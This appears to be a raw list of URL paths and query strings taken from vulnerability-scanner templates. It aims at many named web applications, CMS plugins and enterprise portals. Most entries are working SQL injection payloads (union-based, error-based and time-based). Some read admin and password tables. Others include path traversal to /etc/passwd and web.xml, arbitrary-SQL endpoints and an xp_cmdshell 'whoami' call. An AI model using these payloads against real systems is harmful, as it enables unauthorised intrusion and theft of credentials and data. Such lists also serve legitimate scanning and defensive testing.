+
-
*
[]
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(123),3+from+qs_admin%23--
/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test
/modules/mail/main/maildetail.php?id=-1%27%20union%20all%20select%201,2,md5(4756),md5(4756),md5(4756),6,7,8,md5(4756),md5(4756),md5(4756),12,13,14,15,16,17,18--%20-
/BWMobileService/BWScadaRest.svc/
/api/dp/rptsvcsyncpoint?ccid=1
/api/products?sid=1%27
/?q=node&destination=node
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin
/cacti/index.php
/index.php
/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1
/graphql
/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/action.php
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/modules/blockwishlist/config.xml
/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5(
/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5(
/admin/?page=teams/manage_team&id=1
/admin/?page=teams/view_team&id=1
/admin/?page=requests/view_request&id=1
/admin/?page=requests/manage_request&id=1
/admin/requests/take_action.php?id=6
/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+
/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+
/search/index.php?keyword=1%2527%2520%2561%256e%2564%2520%2528%2565%2578%2574%2572%2561%2563%2574%2576%2561%256c%2575%2565%2528%2531%252c%2563%256f%256e%2563%2561%2574%2528%2530%2578%2537%2565%252c%2528%2573%2565%256c%2565%2563%2574%2520%2575%2573%2565%2572%2528%2529%2529%252c%2530%2578%2537%2565%2529%2529%2529%2523
/ikaimi/rolling/list.php?line=10&page=&classid=10)%20UNION%20ALL%20SELECT%20CONCAT(0x71786a7171,md5(123),0x716a6b6b71),NULL,NULL,NULL,NULL--+-
/pf/rate.php?id=-1+UNION+ALL+SELECT+NULL,CONCAT(0x23,md5(123),0x23)--+-
/kingdee/tree/tree/get_flow.jsp?ids=1&file_type=1)%20union%20select%20NULL,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%20%271234%27))--
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20AND%201=@@version
/fs/
/bottomframe.cgi?user_name=
/WebUtility/SearchCondiction.aspx?PageId=1%20and%201=(CHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(122)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113))--
/folderViewAllFiles.psp?start=0&count=60&url=%2F&dirId=\\%27+union+select+null,name,null,sql,null,null+from+sqlite_master+--+
/?M_id=1%27&type=product
/cgi-bin/DownloadCfg/RouterCfm.cfg
/news_detail.asp?id=-8301%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CHR(113)%26CHR(120)%26CHR(98)%26CHR(122)%26CHR(113)%26CHR(105)%26CHR(82)%26CHR(102)%26CHR(74)%26CHR(82)%26CHR(65)%26CHR(121)%26CHR(121)%26CHR(115)%26CHR(112)%26CHR(87)%26CHR(104)%26CHR(87)%26CHR(89)%26CHR(112)%26CHR(106)%26CHR(72)%26CHR(107)%26CHR(113)%26CHR(116)%26CHR(90)%26CHR(102)%26CHR(114)%26CHR(86)%26CHR(66)%26CHR(85)%26CHR(103)%26CHR(90)%26CHR(66)%26CHR(75)%26CHR(78)%26CHR(70)%26CHR(78)%26CHR(118)%26CHR(115)%26CHR(99)%26CHR(67)%26CHR(121)%26CHR(114)%26CHR(116)%26CHR(113)%26CHR(122)%26CHR(98)%26CHR(120)%26CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20admin_user%16
/arcade.php?act=Arcade&do=stats&comment=a&s_id=1
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
/webservice/get_usedspace.php?site_id=-1%20and%201=2%20union%20all%20select%20(md5(123))
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani
/compliancepolicyelements.inc.php?search=True&searchField=antani
/devices.inc.php?search=True&searchField=antani
/snippets.inc.php?search=True&searchField=antani
/wp-content/plugins/wp-statistics/readme.txt
/homeaction.php
/plus/count.php?view=yes&aid=1+and+updatexml(1,(hex(md5(123))),1)+and+1=1--+-
/news_show.php?id=-%27/*!union/*!select/*!1,2,3,md5(123),5,6,7,8,9,10,11,12,13,14,15*/--%20-
/user/City_ajax.aspx?CityId=33
/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))
/taste/addTaste?company=111&userName=111&openid=111&source=111&mobile=111
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1+union+select+1,2,sys.fn_sqlvarbasetostr(HashBytes(
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version
/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
/
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/Plan/plancommentlist.aspx?type=3and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--&targetid=1
/php/report/lastlogin_list_export.php?stime=a&time=0000-00-01%20union%20select%20@@hostname,0x7e7077,3%20%23
/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager
/services/WorkPlanService
/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27
/CRMtable/PublicPage/CustomerLogin.aspx?id=1%27%20AND%201840%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%20FROM%20master..sysdatabases%20WHERE%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20NOT%20IN%20%28SELECT%20TOP%202%20ISNULL%28CAST%28name%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20master..sysdatabases%20ORDER%20BY%20name%29%20ORDER%20BY%20name%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29--%20OlrO
/index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5({{num}}),3,4,5,6,7,8--
/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27
/datacenter/downloadApp/showInfoEdit.do?_1428145745205&id=dc5593e2e6dd4d2fa4c1651aa2202c99&time=1428145745185&type=
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,md5(123),0x7c,user(),0x7c,@@version))%20desc%20--%20
/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27)%20AND%20(SELECT%208036%20FROM(SELECT%20COUNT(*),CONCAT(0x7176766b71,(SELECT%20(ELT(8036=8036,1))),0x7171786a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20(%27uRUI%27=%27uRUI&spec_array[]=9
/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+
/client/checkuser.aspx?user=%27and%20@@version>0--&pwd=1
/js/player/dmplayer/dmku/index.php?ac=so&key=1
/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`
/comment/api/index.php?gid=1&page=2&type=1&rlist[]=1)@`%27`union%2d%2d%0aselect%23%0A1,2,3,4,5,6,7,8,9,10,11%23%0Afrom%23%0Asea_admin--%20%27
/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)
/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)
/scrm/crm/admin
/app_dev.php/1
/general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php
/index.php/Mobile/Goods/goodsList/id/1/sort_asc/desc,extractvalue(1,concat(0x7e,(select%20md5(1)),0x7e))
/mobile/plugin/CheckServer.jsp?type=mobileSetting
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes(
/Api/portal/elementEcodeAddon/getSqlData?sql=
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(
/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)
/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20
/index.php?m=member&f=login_save
/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=phpinfo%20param0=-1
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))
/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b
/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b
/mainpage/msg.aspx?user=1
/mainpage/msglog.aspx?user=1
/portal/attachment_clearTempFile.action?bean.RecId=1
/portal/attachment_getAttList.action?bean.RecId=1
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/menuaccess.php
/css/eonweb.css
/agc/vicidial_mysqli_errors.txt
/wp-content/plugins/wp-fastest-cache/readme.txt
/wp-content/plugins/LayerSlider/assets/static/public/front.css
/api/v1/confup?mode=&uid=1
/api/v1/confup?mode=lean&uid=1
/api/v1/ndconfig?mode=lean&uid=1
/api/v1/ndconfig?mode=&uid=1
/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)
/api.php?c=project&f=index&id=news&sort=extractvalue(1,concat(char(126),md5(1234)))&token=1234
/listSelectDialogServlet?slType=slFZX&slCdtn=1=2;WAITFOR+DELAY+%270:0:6%27--
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK
/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;
/{{path}}
/search?query=test
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select md5(123456)%23
/a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5({{num}})),0x7e),1))%23
/SM/rpt_listreport_definefield.aspx?ID=2%20and%201=@@version--+
/royal_event/btndates_report.php#?=
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,md5(123456),4#
/page.php?id=51
/index.php?id=1
/home.php?id=1
/dashboard.php?id=1
/profile.php?id=1
/account.php?id=1
/admin.php?id=1
/search.php?id=1
/api.php?id=1
/service.php?id=1
/product.php?id=1
/items.php?id=1
/list.php?id=1
/login.php?id=1
/signin.php?id=1
/signup.php?id=1
/register.php?id=1
/subscribe.php?id=1
/comment.php?id=1
/post.php?id=1
/feedback.php?id=1
/report.php?id=1
/contact.php?id=1
/inquiry.php?id=1
/request.php?id=1
/message.php?id=1
/notes.php?id=1
/update.php?id=1
/user/search.php?id=1
/profile/search.php?id=1
/account/search.php?id=1
/dashboard/search.php?id=1
/admin/search.php?id=1
2
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(123456))
/yyoa/common/js/menu/test.jsp;1.js?doType=101&S1=(SELECT%20md5(123456))
/interface/auth.php?&PASSWORD=1&USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()) ,0x3a) from user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
/interface/ugo.php?OA_USER=a%2527%20and%201=(select%201%20from(select%20count(*),concat((select%20database()),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/share/handle.php?_GET[module]=1
/share/handle.php?_GET[module]=1%27+and+1=%7B%60=%27%60+1%7D+and+1=0+union+select+(select/**/md5({{num}}))--+%27
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))
/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27
/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`
/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+
/mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27
/College-Management-System/admin/asign-single-student-subjects.php
/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName
